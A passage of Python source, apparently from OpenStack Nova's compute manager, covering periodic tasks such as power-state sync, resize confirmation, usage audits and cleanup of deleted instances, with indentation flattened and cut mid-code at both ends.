# We have an instance now to refresh
try:
# Call to network API to get instance info.. this will
# force an update to the instance's info_cache
self._get_instance_nw_info(context, instance)
LOG.debug('Updated the network info_cache for instance',
instance=instance)
except exception.InstanceNotFound:
# Instance is gone.
LOG.debug('Instance no longer exists. Unable to refresh',
instance=instance)
return
except Exception:
LOG.error(_LE('An error occurred while refreshing the network '
'cache.'), instance=instance, exc_info=True)
else:
LOG.debug("Didn't find any instances for network info cache "
"update.")
@periodic_task.periodic_task
def _poll_rebooting_instances(self, context):
if CONF.reboot_timeout > 0:
filters = {'task_state':
[task_states.REBOOTING,
task_states.REBOOT_STARTED,
task_states.REBOOT_PENDING],
'host': self.host}
rebooting = objects.InstanceList.get_by_filters(
context, filters, expected_attrs=[], use_slave=True)
to_poll = []
for instance in rebooting:
if timeutils.is_older_than(instance.updated_at,
CONF.reboot_timeout):
to_poll.append(instance)
self.driver.poll_rebooting_instances(CONF.reboot_timeout, to_poll)
@periodic_task.periodic_task
def _poll_rescued_instances(self, context):
if CONF.rescue_timeout > 0:
filters = {'vm_state': vm_states.RESCUED,
'host': self.host}
rescued_instances = objects.InstanceList.get_by_filters(
context, filters, expected_attrs=["system_metadata"],
use_slave=True)
to_unrescue = []
for instance in rescued_instances:
if timeutils.is_older_than(instance.launched_at,
CONF.rescue_timeout):
to_unrescue.append(instance)
for instance in to_unrescue:
self.compute_api.unrescue(context, instance)
@periodic_task.periodic_task
def _poll_unconfirmed_resizes(self, context):
if CONF.resize_confirm_window == 0:
return
migrations = objects.MigrationList.get_unconfirmed_by_dest_compute(
context, CONF.resize_confirm_window, self.host,
use_slave=True)
migrations_info = dict(migration_count=len(migrations),
confirm_window=CONF.resize_confirm_window)
if migrations_info["migration_count"] > 0:
LOG.info(_LI("Found %(migration_count)d unconfirmed migrations "
"older than %(confirm_window)d seconds"),
migrations_info)
def _set_migration_to_error(migration, reason, **kwargs):
LOG.warning(_LW("Setting migration %(migration_id)s to error: "
"%(reason)s"),
{'migration_id': migration['id'], 'reason': reason},
**kwargs)
migration.status = 'error'
with migration.obj_as_admin():
migration.save()
for migration in migrations:
instance_uuid = migration.instance_uuid
LOG.info(_LI("Automatically confirming migration "
"%(migration_id)s for instance %(instance_uuid)s"),
{'migration_id': migration.id,
'instance_uuid': instance_uuid})
expected_attrs = ['metadata', 'system_metadata']
try:
instance = objects.Instance.get_by_uuid(context,
instance_uuid, expected_attrs=expected_attrs,
use_slave=True)
except exception.InstanceNotFound:
reason = (_("Instance %s not found") %
instance_uuid)
_set_migration_to_error(migration, reason)
continue
if instance.vm_state == vm_states.ERROR:
reason = _("In ERROR state")
_set_migration_to_error(migration, reason,
instance=instance)
continue
# race condition: Do not set the migration state to error for an
# instance in DELETING state, otherwise an instance that is being
# deleted while in RESIZED state will not be able to confirm the
# resize
if instance.task_state in [task_states.DELETING,
task_states.SOFT_DELETING]:
msg = ("Instance being deleted or soft deleted during resize "
"confirmation. Skipping.")
LOG.debug(msg, instance=instance)
continue
# race condition: This condition is hit when this method is
# called between the save of the migration record with a status of
# finished and the save of the instance object with a state of
# RESIZED. The migration record should not be set to error.
if instance.task_state == task_states.RESIZE_FINISH:
msg = ("Instance still resizing during resize "
"confirmation. Skipping.")
LOG.debug(msg, instance=instance)
continue
vm_state = instance.vm_state
task_state = instance.task_state
if vm_state != vm_states.RESIZED or task_state is not None:
reason = (_("In states %(vm_state)s/%(task_state)s, not "
"RESIZED/None") %
{'vm_state': vm_state,
'task_state': task_state})
_set_migration_to_error(migration, reason,
instance=instance)
continue
try:
self.compute_api.confirm_resize(context, instance,
migration=migration)
except Exception as e:
LOG.info(_LI("Error auto-confirming resize: %s. "
"Will retry later."),
e, instance=instance)
@periodic_task.periodic_task(spacing=CONF.shelved_poll_interval)
def _poll_shelved_instances(self, context):
if CONF.shelved_offload_time <= 0:
return
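# Offload instances that have been SHELVED for longer than
# shelved_offload_time.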
filters = {'vm_state': vm_states.SHELVED,
'host': self.host}
shelved_instances = objects.InstanceList.get_by_filters(
context, filters=filters, expected_attrs=['system_metadata'],
use_slave=True)
to_gc = []
for instance in shelved_instances:
sys_meta = instance.system_metadata
shelved_at = timeutils.parse_strtime(sys_meta['shelved_at'])
if timeutils.is_older_than(shelved_at, CONF.shelved_offload_time):
to_gc.append(instance)
for instance in to_gc:
try:
instance.task_state = task_states.SHELVING_OFFLOADING
instance.save()
self.shelve_offload_instance(context, instance,
clean_shutdown=False)
except Exception:
LOG.exception(_LE('Periodic task failed to offload instance.'),
instance=instance)
@periodic_task.periodic_task
def _instance_usage_audit(self, context):
if not CONF.instance_usage_audit:
return
if compute_utils.has_audit_been_run(context,
self.conductor_api,
self.host):
return
begin, end = utils.last_completed_audit_period()
instances = objects.InstanceList.get_active_by_window_joined(
context, begin, end, host=self.host,
expected_attrs=['system_metadata', 'info_cache', 'metadata'],
use_slave=True)
num_instances = len(instances)
errors = 0
successes = 0
LOG.info(_LI("Running instance usage audit for"
" host %(host)s from %(begin_time)s to "
"%(end_time)s. %(number_instances)s"
" instances."),
dict(host=self.host,
begin_time=begin,
end_time=end,
number_instances=num_instances))
start_time = time.time()
compute_utils.start_instance_usage_audit(context,
self.conductor_api,
begin, end,
self.host, num_instances)
for instance in instances:
try:
compute_utils.notify_usage_exists(
self.notifier, context, instance,
ignore_missing_network_data=False)
successes += 1
except Exception:
LOG.exception(_LE('Failed to generate usage '
'audit for instance '
'on host %s'), self.host,
instance=instance)
errors += 1
compute_utils.finish_instance_usage_audit(context,
self.conductor_api,
begin, end,
self.host, errors,
"Instance usage audit ran "
"for host %s, %s instances "
"in %s seconds." % (
self.host,
num_instances,
time.time() - start_time))
@periodic_task.periodic_task(spacing=CONF.bandwidth_poll_interval)
def _poll_bandwidth_usage(self, context):
if not self._bw_usage_supported:
return
prev_time, start_time = utils.last_completed_audit_period()
curr_time = time.time()
if (curr_time - self._last_bw_usage_poll >
CONF.bandwidth_poll_interval):
self._last_bw_usage_poll = curr_time
LOG.info(_LI("Updating bandwidth usage cache"))
cells_update_interval = CONF.cells.bandwidth_update_interval
if (cells_update_interval > 0 and
curr_time - self._last_bw_usage_cell_update >
cells_update_interval):
self._last_bw_usage_cell_update = curr_time
update_cells = True
else:
update_cells = False
instances = objects.InstanceList.get_by_host(context,
self.host,
use_slave=True)
try:
bw_counters = self.driver.get_all_bw_counters(instances)
except NotImplementedError:
# NOTE(mdragon): Not all hypervisors have bandwidth polling
# implemented yet. If they don't it doesn't break anything,
# they just don't get the info in the usage events.
# NOTE(PhilDay): Record that it's not supported so we can
# skip fast on future calls rather than waste effort getting
# the list of instances.
LOG.warning(_LW("Bandwidth usage not supported by "
"hypervisor."))
self._bw_usage_supported = False
return
refreshed = timeutils.utcnow()
for bw_ctr in bw_counters:
# Allow switching of greenthreads between queries.
greenthread.sleep(0)
bw_in = 0
bw_out = 0
last_ctr_in = None
last_ctr_out = None
usage = objects.BandwidthUsage.get_by_instance_uuid_and_mac(
context, bw_ctr['uuid'], bw_ctr['mac_address'],
start_period=start_time, use_slave=True)
if usage:
bw_in = usage.bw_in
bw_out = usage.bw_out
last_ctr_in = usage.last_ctr_in
last_ctr_out = usage.last_ctr_out
else:
usage = (objects.BandwidthUsage.
get_by_instance_uuid_and_mac(
context, bw_ctr['uuid'], bw_ctr['mac_address'],
start_period=prev_time, use_slave=True))
if usage:
last_ctr_in = usage.last_ctr_in
last_ctr_out = usage.last_ctr_out
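# If the current counter is lower than the last recorded value,
# the hypervisor counter has rolled over (e.g. the domain was
# restarted), so the pre-rollover delta is lost and only the
# current counter value is added.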
if last_ctr_in is not None:
if bw_ctr['bw_in'] < last_ctr_in:
# counter rollover
bw_in += bw_ctr['bw_in']
else:
bw_in += (bw_ctr['bw_in'] - last_ctr_in)
if last_ctr_out is not None:
if bw_ctr['bw_out'] < last_ctr_out:
# counter rollover
bw_out += bw_ctr['bw_out']
else:
bw_out += (bw_ctr['bw_out'] - last_ctr_out)
objects.BandwidthUsage(context=context).create(
bw_ctr['uuid'],
bw_ctr['mac_address'],
bw_in,
bw_out,
bw_ctr['bw_in'],
bw_ctr['bw_out'],
start_period=start_time,
last_refreshed=refreshed,
update_cells=update_cells)
def _get_host_volume_bdms(self, context, use_slave=False):
"""Return all block device mappings on a compute host."""
compute_host_bdms = []
instances = objects.InstanceList.get_by_host(context, self.host,
use_slave=use_slave)
for instance in instances:
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid, use_slave=use_slave)
instance_bdms = [bdm for bdm in bdms if bdm.is_volume]
compute_host_bdms.append(dict(instance=instance,
instance_bdms=instance_bdms))
return compute_host_bdms
def _update_volume_usage_cache(self, context, vol_usages):
"""Updates the volume usage cache table with a list of stats."""
for usage in vol_usages:
# Allow switching of greenthreads between queries.
greenthread.sleep(0)
self.conductor_api.vol_usage_update(context, usage['volume'],
usage['rd_req'],
usage['rd_bytes'],
usage['wr_req'],
usage['wr_bytes'],
usage['instance'])
@periodic_task.periodic_task(spacing=CONF.volume_usage_poll_interval)
def _poll_volume_usage(self, context, start_time=None):
if CONF.volume_usage_poll_interval == 0:
return
if not start_time:
start_time = utils.last_completed_audit_period()[1]
compute_host_bdms = self._get_host_volume_bdms(context,
use_slave=True)
if not compute_host_bdms:
return
LOG.debug("Updating volume usage cache")
try:
vol_usages = self.driver.get_all_volume_usage(context,
compute_host_bdms)
except NotImplementedError:
return
self._update_volume_usage_cache(context, vol_usages)
@periodic_task.periodic_task(spacing=CONF.sync_power_state_interval,
run_immediately=True)
def _sync_power_states(self, context):
"""Align power states between the database and the hypervisor.
To sync power state data we query the driver for the number of
virtual machines known to the hypervisor and compare it with the
number of virtual machines known to the database; we then proceed
in a lazy loop, one database record at a time, checking if the
hypervisor has the same power state as is in the database.
"""
db_instances = objects.InstanceList.get_by_host(context, self.host,
expected_attrs=[],
use_slave=True)
num_vm_instances = self.driver.get_num_instances()
num_db_instances = len(db_instances)
if num_vm_instances != num_db_instances:
LOG.warning(_LW("While synchronizing instance power states, found "
"%(num_db_instances)s instances in the database "
"and %(num_vm_instances)s instances on the "
"hypervisor."),
{'num_db_instances': num_db_instances,
'num_vm_instances': num_vm_instances})
def _sync(db_instance):
# NOTE(melwitt): This must be synchronized as we query state from
# two separate sources, the driver and the database.
# They are set (in stop_instance) and read, in sync.
@utils.synchronized(db_instance.uuid)
def query_driver_power_state_and_sync():
self._query_driver_power_state_and_sync(context, db_instance)
try:
query_driver_power_state_and_sync()
except Exception:
LOG.exception(_LE("Periodic sync_power_state task had an "
"error while processing an instance."),
instance=db_instance)
self._syncs_in_progress.pop(db_instance.uuid)
for db_instance in db_instances:
# process syncs asynchronously - don't want instance locking to
# block entire periodic task thread
uuid = db_instance.uuid
if uuid in self._syncs_in_progress:
LOG.debug('Sync already in progress for %s' % uuid)
else:
LOG.debug('Triggering sync for uuid %s' % uuid)
self._syncs_in_progress[uuid] = True
self._sync_power_pool.spawn_n(_sync, db_instance)
def _query_driver_power_state_and_sync(self, context, db_instance):
if db_instance.task_state is not None:
LOG.info(_LI("During sync_power_state the instance has a "
"pending task (%(task)s). Skip."),
{'task': db_instance.task_state}, instance=db_instance)
return
# No pending tasks. Now try to figure out the real vm_power_state.
try:
vm_instance = self.driver.get_info(db_instance)
vm_power_state = vm_instance.state
except exception.InstanceNotFound:
vm_power_state = power_state.NOSTATE
# Note(maoy): the above get_info call might take a long time,
# for example, because of a broken libvirt driver.
try:
self._sync_instance_power_state(context,
db_instance,
vm_power_state,
use_slave=True)
except exception.InstanceNotFound:
# NOTE(hanlind): If the instance gets deleted during sync,
# silently ignore.
pass
def _sync_instance_power_state(self, context, db_instance, vm_power_state,
use_slave=False):
"""Align instance power state between the database and hypervisor.
If the instance is not found on the hypervisor, but is in the database,
then a stop() API will be called on the instance.
"""
# We re-query the DB to get the latest instance info to minimize
# (not eliminate) race condition.
db_instance.refresh(use_slave=use_slave)
db_power_state = db_instance.power_state
vm_state = db_instance.vm_state
if self.host != db_instance.host:
# on the sending end of nova-compute _sync_power_state
# may have yielded to the greenthread performing a live
# migration; this in turn has changed the resident-host
# for the VM; However, the instance is still active, it
# is just in the process of migrating to another host.
# This implies that the compute source must relinquish
# control to the compute destination.
LOG.info(_LI("During the sync_power process the "
"instance has moved from "
"host %(src)s to host %(dst)s"),
{'src': db_instance.host,
'dst': self.host},
instance=db_instance)
return
elif db_instance.task_state is not None:
# on the receiving end of nova-compute, it could happen
# that the DB instance already reports the new resident
# host but the actual VM has not shown up on the
# hypervisor yet. In this case, let's allow the loop to
# continue and run the state sync in a later round
LOG.info(_LI("During sync_power_state the instance has a "
"pending task (%(task)s). Skip."),
{'task': db_instance.task_state},
instance=db_instance)
return
orig_db_power_state = db_power_state
if vm_power_state != db_power_state:
LOG.info(_LI('During _sync_instance_power_state the DB '
'power_state (%(db_power_state)s) does not match '
'the vm_power_state from the hypervisor '
'(%(vm_power_state)s). Updating power_state in the '
'DB to match the hypervisor.'),
{'db_power_state': db_power_state,
'vm_power_state': vm_power_state},
instance=db_instance)
# power_state is always updated from hypervisor to db
db_instance.power_state = vm_power_state
db_instance.save()
db_power_state = vm_power_state
# Note(maoy): Now resolve the discrepancy between vm_state and
# vm_power_state. We go through all possible vm_states.
if vm_state in (vm_states.BUILDING,
vm_states.RESCUED,
vm_states.RESIZED,
vm_states.SUSPENDED,
vm_states.ERROR):
# TODO(maoy): we ignore these vm_state for now.
pass
elif vm_state == vm_states.ACTIVE:
# The only rational power state should be RUNNING
if vm_power_state in (power_state.SHUTDOWN,
power_state.CRASHED):
LOG.warning(_LW("Instance shutdown by itself. Calling the "
"stop API. Current vm_state: %(vm_state)s, "
"current task_state: %(task_state)s, "
"original DB power_state: %(db_power_state)s, "
"current VM power_state: %(vm_power_state)s"),
{'vm_state': vm_state,
'task_state': db_instance.task_state,
'db_power_state': orig_db_power_state,
'vm_power_state': vm_power_state},
instance=db_instance)
try:
# Note(maoy): here we call the API instead of
# brutally updating the vm_state in the database
# to allow all the hooks and checks to be performed.
if db_instance.shutdown_terminate:
self.compute_api.delete(context, db_instance)
else:
self.compute_api.stop(context, db_instance)
except Exception:
# Note(maoy): there is no need to propagate the error
# because the same power_state will be retrieved next
# time and retried.
# For example, there might be another task scheduled.
LOG.exception(_LE("error during stop() in "
"sync_power_state."),
instance=db_instance)
elif vm_power_state == power_state.SUSPENDED:
LOG.warning(_LW("Instance is suspended unexpectedly. Calling "
"the stop API."), instance=db_instance)
try:
self.compute_api.stop(context, db_instance)
except Exception:
LOG.exception(_LE("error during stop() in "
"sync_power_state."),
instance=db_instance)
elif vm_power_state == power_state.PAUSED:
# Note(maoy): a VM may get into the paused state not only
# because of a user request via API calls, but also
# due to (temporary) external instrumentation.
# Before the virt layer can reliably report the reason,
# we simply ignore the state discrepancy. In many cases,
# the VM state will go back to running after the external
# instrumentation is done. See bug 1097806 for details.
LOG.warning(_LW("Instance is paused unexpectedly. Ignore."),
instance=db_instance)
elif vm_power_state == power_state.NOSTATE:
# Occasionally, depending on the status of the hypervisor,
# which could be restarting for example, an instance may
# not be found. Therefore just log the condition.
LOG.warning(_LW("Instance is unexpectedly not found. Ignore."),
instance=db_instance)
elif vm_state == vm_states.STOPPED:
if vm_power_state not in (power_state.NOSTATE,
power_state.SHUTDOWN,
power_state.CRASHED):
LOG.warning(_LW("Instance is not stopped. Calling "
"the stop API. Current vm_state: %(vm_state)s,"
" current task_state: %(task_state)s, "
"original DB power_state: %(db_power_state)s, "
"current VM power_state: %(vm_power_state)s"),
{'vm_state': vm_state,
'task_state': db_instance.task_state,
'db_power_state': orig_db_power_state,
'vm_power_state': vm_power_state},
instance=db_instance)
try:
# NOTE(russellb) Force the stop, because normally the
# compute API would not allow an attempt to stop a stopped
# instance.
self.compute_api.force_stop(context, db_instance)
except Exception:
LOG.exception(_LE("error during stop() in "
"sync_power_state."),
instance=db_instance)
elif vm_state == vm_states.PAUSED:
if vm_power_state in (power_state.SHUTDOWN,
power_state.CRASHED):
LOG.warning(_LW("Paused instance shutdown by itself. Calling "
"the stop API."), instance=db_instance)
try:
self.compute_api.force_stop(context, db_instance)
except Exception:
LOG.exception(_LE("error during stop() in "
"sync_power_state."),
instance=db_instance)
elif vm_state in (vm_states.SOFT_DELETED,
vm_states.DELETED):
if vm_power_state not in (power_state.NOSTATE,
power_state.SHUTDOWN):
# Note(maoy): this should be taken care of periodically in
# _cleanup_running_deleted_instances().
LOG.warning(_LW("Instance is not (soft-)deleted."),
instance=db_instance)
@periodic_task.periodic_task
def _reclaim_queued_deletes(self, context):
"""Reclaim instances that are queued for deletion."""
interval = CONF.reclaim_instance_interval
if interval <= 0:
LOG.debug("CONF.reclaim_instance_interval <= 0, skipping...")
return
# TODO(comstud, jichenjc): Dummy quota object for now. See bug 1296414.
# The only case where the quota might be inconsistent is if
# the compute node died between setting the instance state to
# SOFT_DELETED and committing the quota to the DB. When the compute
# node starts again it will have no idea whether the reservation was
# committed or has expired; since it's a rare case, it is marked as a todo.
quotas = objects.Quotas.from_reservations(context, None)
filters = {'vm_state': vm_states.SOFT_DELETED,
'task_state': None,
'host': self.host}
instances = objects.InstanceList.get_by_filters(
context, filters,
expected_attrs=objects.instance.INSTANCE_DEFAULT_FIELDS,
use_slave=True)
for instance in instances:
if self._deleted_old_enough(instance, interval):
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
LOG.info(_LI('Reclaiming deleted instance'), instance=instance)
try:
self._delete_instance(context, instance, bdms, quotas)
except Exception as e:
LOG.warning(_LW("Periodic reclaim failed to delete "
"instance: %s"),
e, instance=instance)
@periodic_task.periodic_task
def update_available_resource(self, context):
"""See driver.get_available_resource()
Periodic process that keeps the compute host's understanding of
resource availability and usage in sync with the underlying hypervisor.
:param context: security context
"""
new_resource_tracker_dict = {}
nodenames = set(self.driver.get_available_nodes())
for nodename in nodenames:
rt = self._get_resource_tracker(nodename)
rt.update_available_resource(context)
new_resource_tracker_dict[nodename] = rt
# Delete orphan compute node not reported by driver but still in db
compute_nodes_in_db = self._get_compute_nodes_in_db(context,
use_slave=True)
for cn in compute_nodes_in_db:
if cn.hypervisor_hostname not in nodenames:
LOG.info(_LI("Deleting orphan compute node %s") % cn.id)
cn.destroy()
self._resource_tracker_dict = new_resource_tracker_dict
def _get_compute_nodes_in_db(self, context, use_slave=False):
try:
return objects.ComputeNodeList.get_all_by_host(context, self.host,
use_slave=use_slave)
except exception.NotFound:
LOG.error(_LE("No compute node record for host %s"), self.host)
return []
@periodic_task.periodic_task(
spacing=CONF.running_deleted_instance_poll_interval)
def _cleanup_running_deleted_instances(self, context):
"""Cleanup any instances which are erroneously still running after
having been deleted.
Valid actions to take are:
1. noop - do nothing
2. log - log which instances are erroneously running
3. reap - shutdown and cleanup any erroneously running instances
4. shutdown - power off *and disable* any erroneously running
instances
The use-case for this cleanup task is: for various reasons, it may be
possible for the database to show an instance as deleted but for that
instance to still be running on a host machine (see bug
https://bugs.launchpad.net/nova/+bug/911366).
This cleanup task is a cross-hypervisor utility for finding these
zombied instances and either logging the discrepancy (likely what you
should do in production), or automatically reaping the instances (more
appropriate for dev environments).
"""
action = CONF.running_deleted_instance_action
if action == "noop":
return
# NOTE(sirp): admin contexts don't ordinarily return deleted records
with utils.temporary_mutation(context, read_deleted="yes"):
for instance in self._running_deleted_instances(context):
if action == "log":
LOG.warning(_LW("Detected instance with name label "
"'%s' which is marked as "
"DELETED but still present on host."),
instance.name, instance=instance)
elif action == 'shutdown':
LOG.info(_LI("Powering off instance with name label "
"'%s' which is marked as "
"DELETED but still present on host."),
instance.name, instance=instance)
try:
try:
# disable starting the instance
self.driver.set_bootable(instance, False)
except NotImplementedError:
LOG.warning(_LW("set_bootable is not implemented "
"for the current driver"))
# and power it off
self.driver.power_off(instance)
except Exception:
msg = _LW("Failed to power off instance")
LOG.warn(msg, instance=instance, exc_info=True)
elif action == 'reap':
LOG.info(_LI("Destroying instance with name label "
"'%s' which is marked as "
"DELETED but still present on host."),
instance.name, instance=instance)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid, use_slave=True)
self.instance_events.clear_events_for_instance(instance)
try:
self._shutdown_instance(context, instance, bdms,
notify=False)
self._cleanup_volumes(context, instance.uuid, bdms)
except Exception as e:
LOG.warning(_LW("Periodic cleanup failed to delete "
"instance: %s"),
e, instance=instance)
else:
raise Exception(_("Unrecognized value '%s'"
" for CONF.running_deleted_"
"instance_action") % action)
def _running_deleted_instances(self, context):
"""Returns a list of instances nova thinks is deleted,
but the hypervisor thinks is still running.
"""
timeout = CONF.running_deleted_instance_timeout
filters = {'deleted': True,
'soft_deleted': False,
'host': self.host}
instances = self._get_instances_on_driver(context, filters)
return [i for i in instances if self._deleted_old_enough(i, timeout)]
def _deleted_old_enough(self, instance, timeout):
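"""Return True if the instance was deleted at least `timeout`
seconds ago (or has no deleted_at timestamp)."""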
deleted_at = instance['deleted_at']
if isinstance(instance, obj_base.NovaObject) and deleted_at:
deleted_at = deleted_at.replace(tzinfo=None)
return (not deleted_at or timeutils.is_older_than(deleted_at, timeout))
@contextlib.contextmanager
def _error_out_instance_on_exception(self, context, instance,
quotas=None,
instance_state=vm_states.ACTIVE):
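"""Context manager that resets the instance to ``instance_state``
(rolling back ``quotas`` if given) on NotImplementedError, restores
it to ACTIVE on InstanceFaultRollback, and puts it into ERROR state
on any other exception."""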
instance_uuid = instance.uuid
try:
yield
except NotImplementedError as error:
with excutils.save_and_reraise_exception():
if quotas:
quotas.rollback()
LOG.info(_LI("Setting instance back to %(state)s after: "
"%(error)s"),
{'state': instance_state, 'error': error},
instance_uuid=instance_uuid)
self._instance_update(context, instance_uuid,
vm_state=instance_state,
task_state=None)
except exception.InstanceFaultRollback as error:
if quotas:
quotas.rollback()
LOG.info(_LI("Setting instance back to ACTIVE after: %s"),
error, instance_uuid=instance_uuid)
self._instance_update(context, instance_uuid,
vm_state=vm_states.ACTIVE,
task_state=None)
raise error.inner_exception
except Exception:
LOG.exception(_LE('Setting instance vm_state to ERROR'),
instance_uuid=instance_uuid)
with excutils.save_and_reraise_exception():
if quotas:
quotas.rollback()
self._set_instance_error_state(context, instance)
@aggregate_object_compat
@wrap_exception()
def add_aggregate_host(self, context, aggregate, host, slave_info):
"""Notify hypervisor of change (for hypervisor pools)."""
try:
self.driver.add_to_aggregate(context, aggregate, host,
slave_info=slave_info)
except NotImplementedError:
LOG.debug('Hypervisor driver does not support '
'add_aggregate_host')
except exception.AggregateError:
with excutils.save_and_reraise_exception():
self.driver.undo_aggregate_operation(
context,
aggregate.delete_host,
aggregate, host)
@aggregate_object_compat
@wrap_exception()
def remove_aggregate_host(self, context, host, slave_info, aggregate):
"""Removes a host from a physical hypervisor pool."""
try:
self.driver.remove_from_aggregate(context, aggregate, host,
slave_info=slave_info)
except NotImplementedError:
LOG.debug('Hypervisor driver does not support '
'remove_aggregate_host')
except (exception.AggregateError,
exception.InvalidAggregateAction) as e:
with excutils.save_and_reraise_exception():
self.driver.undo_aggregate_operation(
context,
aggregate.add_host,
aggregate, host,
isinstance(e, exception.AggregateError))
def _process_instance_event(self, instance, event):
_event = self.instance_events.pop_instance_event(instance, event)
if _event:
LOG.debug('Processing event %(event)s',
{'event': event.key}, instance=instance)
_event.send(event)
@wrap_exception()
def external_instance_event(self, context, instances, events):
# NOTE(danms): Some event types are handled by the manager, such
# as when we're asked to update the instance's info_cache. If it's
# not one of those, look for some thread(s) waiting for the event and
# unblock them if so.
for event in events:
instance = [inst for inst in instances
if inst.uuid == event.instance_uuid][0]
LOG.debug('Received event %(event)s',
{'event': event.key},
instance=instance)
if event.name == 'network-changed':
self.network_api.get_instance_nw_info(context, instance)
else:
self._process_instance_event(instance, event)
@periodic_task.periodic_task(spacing=CONF.image_cache_manager_interval,
external_process_ok=True)
def _run_image_cache_manager_pass(self, context):
"""Run a single pass of the image cache manager."""
if not self.driver.capabilities["has_imagecache"]:
return
# Determine what other nodes use this storage
storage_users.register_storage_use(CONF.instances_path, CONF.host)
nodes = storage_users.get_storage_users(CONF.instances_path)
# Filter all_instances to only include those nodes which share this
# storage path.
# TODO(mikal): this should be further refactored so that the cache
# cleanup code doesn't know what those instances are, just a remote
# count, and then this logic should be pushed up the stack.
filters = {'deleted': False,
'soft_deleted': True,
'host': nodes}
filtered_instances = objects.InstanceList.get_by_filters(context,
filters, expected_attrs=[], use_slave=True)
self.driver.manage_image_cache(context, filtered_instances)
@periodic_task.periodic_task(spacing=CONF.instance_delete_interval)
def _run_pending_deletes(self, context):
"""Retry any pending instance file deletes."""
LOG.debug('Cleaning up deleted instances')
filters = {'deleted': True,
'soft_deleted': False,
'host': CONF.host,
'cleaned': False}
attrs = ['info_cache', 'security_groups', 'system_metadata']
with utils.temporary_mutation(context, read_deleted='yes'):
instances = objects.InstanceList.get_by_filters(
context, filters, expected_attrs=attrs, use_slave=True)
LOG.debug('There are %d instances to clean', len(instances))
for instance in instances:
attempts = int(instance.system_metadata.get('clean_attempts', '0'))
LOG.debug('Instance has had %(attempts)s of %(max)s '
'cleanup attempts',
{'attempts': attempts,
'max': CONF.maximum_instance_delete_attempts},
instance=instance)
if attempts < CONF.maximum_instance_delete_attempts:
success = self.driver.delete_instance_files(instance)
instance.system_metadata['clean_attempts'] = str(attempts + 1)
if success:
instance.cleaned = True
with utils.temporary_mutation(context, read_deleted='yes'):
instance.save()
@periodic_task.periodic_task(spacing=CONF.instance_delete_interval)
def _cleanup_incomplete_migrations(self, context):
"""Delete instance files on failed resize/revert-resize operation
        If an instance gets deleted while a resize/revert-resize operation is
        in progress, its files might remain on either the source or the
        destination compute node because of a race condition.
"""
LOG.debug('Cleaning up deleted instances with incomplete migration ')
migration_filters = {'host': CONF.host,
'status': 'error'}
migrations = objects.MigrationList.get_by_filters(context,
migration_filters)
if not migrations:
return
inst_uuid_from_migrations = set([migration.instance_uuid for migration
in migrations])
inst_filters = {'deleted': True, 'soft_deleted': False,
'uuid': inst_uuid_from_migrations}
attrs = ['info_cache', 'security_groups', 'system_metadata']
with utils.temporary_mutation(context, read_deleted='yes'):
instances = objects.InstanceList.get_by_filters(
context, inst_filters, expected_attrs=attrs, use_slave=True)
for instance in instances:
if instance.host != CONF.host:
for migration in migrations:
if instance.uuid == migration.instance_uuid:
                        # Delete instance files if they were not cleaned up
                        # properly on either the source or destination compute
                        # node when the instance was deleted during resizing.
self.driver.delete_instance_files(instance)
try:
migration.status = 'failed'
with migration.obj_as_admin():
migration.save()
except exception.MigrationNotFound:
LOG.warning(_LW("Migration %s is not found."),
migration.id, context=context,
instance=instance)
break
@messaging.expected_exceptions(exception.InstanceQuiesceNotSupported,
exception.NovaException,
NotImplementedError)
@wrap_exception()
def quiesce_instance(self, context, instance):
"""Quiesce an instance on this host."""
context = context.elevated()
image_ref = instance.image_ref
image_meta = compute_utils.get_image_metadata(
context, self.image_api, image_ref, instance)
self.driver.quiesce(context, instance, image_meta)
def _wait_for_snapshots_completion(self, context, mapping):
for mapping_dict in mapping:
if mapping_dict.get('source_type') == 'snapshot':
def _wait_snapshot():
snapshot = self.volume_api.get_snapshot(
context, mapping_dict['snapshot_id'])
if snapshot.get('status') != 'creating':
raise loopingcall.LoopingCallDone()
timer = loopingcall.FixedIntervalLoopingCall(_wait_snapshot)
timer.start(interval=0.5).wait()
@messaging.expected_exceptions(exception.InstanceQuiesceNotSupported,
exception.NovaException,
NotImplementedError)
@wrap_exception()
def unquiesce_instance(self, context, instance, mapping=None):
"""Unquiesce an instance on this host.
If snapshots' image mapping is provided, it waits until snapshots are
        completed before unquiescing.
"""
context = context.elevated()
if mapping:
try:
self._wait_for_snapshots_completion(context, mapping)
except Exception as error:
LOG.exception(_LE("Exception while waiting completion of "
"volume snapshots: %s"),
error, instance=instance)
image_ref = instance.image_ref
image_meta = compute_utils.get_image_metadata(
context, self.image_api, image_ref, instance)
self.driver.unquiesce(context, instance, image_meta)
# TODO(danms): This goes away immediately in Lemming and is just
# present in Kilo so that we can receive v3.x and v4.0 messages
class _ComputeV4Proxy(object):
target = messaging.Target(version='4.0')
def __init__(self, manager):
self.manager = manager
def add_aggregate_host(self, ctxt, aggregate, host, slave_info=None):
return self.manager.add_aggregate_host(ctxt, aggregate, host,
slave_info=slave_info)
def add_fixed_ip_to_instance(self, ctxt, network_id, instance):
return self.manager.add_fixed_ip_to_instance(ctxt,
network_id,
instance)
def attach_interface(self, ctxt, instance, network_id, port_id,
requested_ip):
return self.manager.attach_interface(ctxt, instance, network_id,
port_id, requested_ip)
def attach_volume(self, ctxt, instance, bdm):
# NOTE(danms): In 3.x, attach_volume had mountpoint and volume_id
# parameters, which are gone from 4.x. Provide None for each to
# the 3.x manager above and remove in Lemming.
return self.manager.attach_volume(ctxt, None, None,
instance=instance,
bdm=bdm)
def change_instance_metadata(self, ctxt, instance, diff):
return self.manager.change_instance_metadata(
ctxt, diff=diff, instance=instance)
def check_can_live_migrate_destination(self, ctxt, instance,
block_migration, disk_over_commit):
return self.manager.check_can_live_migrate_destination(
ctxt, instance, block_migration, disk_over_commit)
def check_can_live_migrate_source(self, ctxt, instance, dest_check_data):
return self.manager.check_can_live_migrate_source(ctxt, instance,
dest_check_data)
def check_instance_shared_storage(self, ctxt, instance, data):
return self.manager.check_instance_shared_storage(ctxt, instance, data)
def confirm_resize(self, ctxt, instance, reservations, migration):
return self.manager.confirm_resize(ctxt, instance,
reservations, migration)
def detach_interface(self, ctxt, instance, port_id):
return self.manager.detach_interface(ctxt, instance, port_id)
def detach_volume(self, ctxt, volume_id, instance):
# NOTE(danms): Pass instance by kwarg to help the object_compat
# decorator, as real RPC dispatch does.
return self.manager.detach_volume(ctxt, volume_id, instance=instance)
def finish_resize(self, ctxt, disk_info, image, instance,
